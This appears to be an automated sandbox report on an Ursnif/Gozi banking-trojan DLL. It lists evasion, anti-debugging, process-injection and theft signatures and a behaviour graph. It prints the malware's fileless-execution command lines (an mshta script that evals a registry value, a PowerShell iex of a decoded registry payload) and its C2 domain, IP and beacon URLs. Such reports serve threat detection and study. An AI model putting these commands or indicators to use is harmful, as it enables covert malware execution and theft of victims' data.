Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3135
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5852
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336 Thread sleep count: 86 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336 Thread sleep count: 70 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3820 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3820 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3820 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A1056C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_04A1056C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049FBF1E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_049FBF1E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0AF0E lstrlenW,wcscpy,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_04A0AF0E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A09363 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_04A09363
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A05ECD wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_04A05ECD
Source: mshta.exe, 0000001E.00000003.501243554.0000026060CFA000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B_sG
Source: control.exe, 00000026.00000002.560578207.0000018E59DD6000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\k
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A010B4 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 1_2_04A010B4
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A03589 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_04A03589

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\System32\control.exe base: D30000 protect: page execute and read and write Jump to behavior
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 736E1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 736E1580
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 6348 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3388
Source: C:\Windows\System32\control.exe Thread register set: target process: 3388
Source: C:\Windows\System32\control.exe Thread register set: target process: 5516
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7028E12E0 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: D30000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7028E12E0 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3736.tmp' 'c:\Users\user\AppData\Local\Temp\kboh4jur\CSC3D4FC79349B84E14A11DB5BE381E50D0.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES48CA.tmp' 'c:\Users\user\AppData\Local\Temp\xjciegge\CSCE781F4B6FB444C94B757D31BBD45D613.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A08436 cpuid 1_2_04A08436
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A012B3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_04A012B3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0F46C GetSystemTimeAsFileTime,HeapFree, 1_2_04A0F46C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049FB96C RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_049FB96C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049F5CA8 SleepEx,GetVersion,GetModuleHandleA,GetProcAddress, 1_2_049F5CA8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7068, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6348, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6660, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7068, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6348, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6660, type: MEMORY
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 341461 Sample: mal.dll Startdate: 19/01/2021 Architecture: WINDOWS Score: 100 55 8.8.8.8.in-addr.arpa 2->55 57 1.0.0.127.in-addr.arpa 2->57 59 2 other IPs or domains 2->59 69 Found malware configuration 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 Yara detected  Ursnif 2->73 75 8 other signatures 2->75 9 loaddll32.exe 1 2->9         started        11 mshta.exe 2->11         started        signatures3 process4 signatures5 14 regsvr32.exe 1 9->14         started        17 cmd.exe 1 9->17         started        85 Suspicious powershell command line found 11->85 19 powershell.exe 11->19         started        process6 file7 87 Detected Gozi e-Banking trojan 14->87 89 Writes to foreign memory regions 14->89 91 Allocates memory in foreign processes 14->91 101 2 other signatures 14->101 22 control.exe 14->22         started        25 iexplore.exe 2 98 17->25         started        47 C:\Users\user\AppData\Local\...\xjciegge.0.cs, UTF-8 19->47 dropped 49 C:\Users\user\AppData\...\kboh4jur.cmdline, UTF-8 19->49 dropped 93 Modifies the context of a thread in another process (thread injection) 19->93 95 Maps a DLL or memory area into another process 19->95 97 Compiles code for process injection (via .Net compiler) 19->97 99 Creates a thread in another existing process (thread injection) 19->99 27 csc.exe 19->27         started        30 csc.exe 19->30         started        32 conhost.exe 19->32         started        signatures8 process9 file10 77 Changes memory attributes in foreign processes to executable or writable 22->77 79 Modifies the context of a thread in another process (thread injection) 22->79 81 Maps a DLL or memory area into another process 22->81 83 Creates a thread in another existing process (thread injection) 22->83 34 iexplore.exe 5 157 25->34         started        37 iexplore.exe 30 25->37         started        39 iexplore.exe 25->39         started        45 2 other processes 25->45 51 C:\Users\user\AppData\Local\...\kboh4jur.dll, PE32 27->51 dropped 41 cvtres.exe 27->41         started        53 C:\Users\user\AppData\Local\...\xjciegge.dll, PE32 30->53 dropped 43 cvtres.exe 30->43         started        signatures11 process12 dnsIp13 61 img.img-taboola.com 34->61 63 edge.gycpi.b.yahoodns.net 87.248.118.23, 443, 49732, 49733 YAHOO-DEBDE United Kingdom 34->63 67 9 other IPs or domains 34->67 65 lopppooole.xyz 185.186.244.49, 49765, 49766, 49767 WEBZILLANL Netherlands 37->65
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.186.244.49
unknown Netherlands
35415 WEBZILLANL false
87.248.118.23
unknown United Kingdom
203220 YAHOO-DEBDE false
151.101.1.44
unknown United States
54113 FASTLYUS false

Contacted Domains

Name IP Active
contextual.media.net 104.84.56.24 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 104.84.56.24 true
lg3.media.net 104.84.56.24 true
resolver1.opendns.com 208.67.222.222 true
lopppooole.xyz 185.186.244.49 true
edge.gycpi.b.yahoodns.net 87.248.118.23 true
www.msn.com unknown unknown
srtb.msn.com unknown unknown
img.img-taboola.com unknown unknown
s.yimg.com unknown unknown
web.vortex.data.msn.com unknown unknown
1.0.0.127.in-addr.arpa unknown unknown
8.8.8.8.in-addr.arpa unknown unknown
cvision.media.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://lopppooole.xyz/manifest/QNYwAwEGA6Nk/oqkcQpDHt62/AROwNcnS85Yj6H/Kiw419AbdChBoBC1YflBI/btAWmao42bhmIwaw/rj9hokXq7cOPoMP/C6Fociq1a8i5R_2FP7/qMKfDX8g_/2FYBsdaqsojE5zyNbglU/W9s5aDB_2BHGEIqE0sh/uWRUQeNVDF60PzY5NXM2Np/58y3_2Bk8eYWnbwr0ru/GleU.cnx false
  • Avira URL Cloud: safe
unknown
http://lopppooole.xyz/manifest/DGnwMOevMC4C/FwTBVjFVT7Q/om1iea6xc3SLTm/LhexSznuxAV0l1eIdd7aN/EYbCXiwsAXb_2FQL/BI0B_2BEHYbzkri/CVbt6Ud3hbu6juyQ39/_2FdPSw_2/FAhy67XuasfNyAs2fp_2/FWN1bdwTDPIYYGwfcgE/MI3f3RUzobEk8E33KaQBi_/2BX59YotVm2s8/5lk6oUdX/LH2keW.cnx false
  • Avira URL Cloud: safe
unknown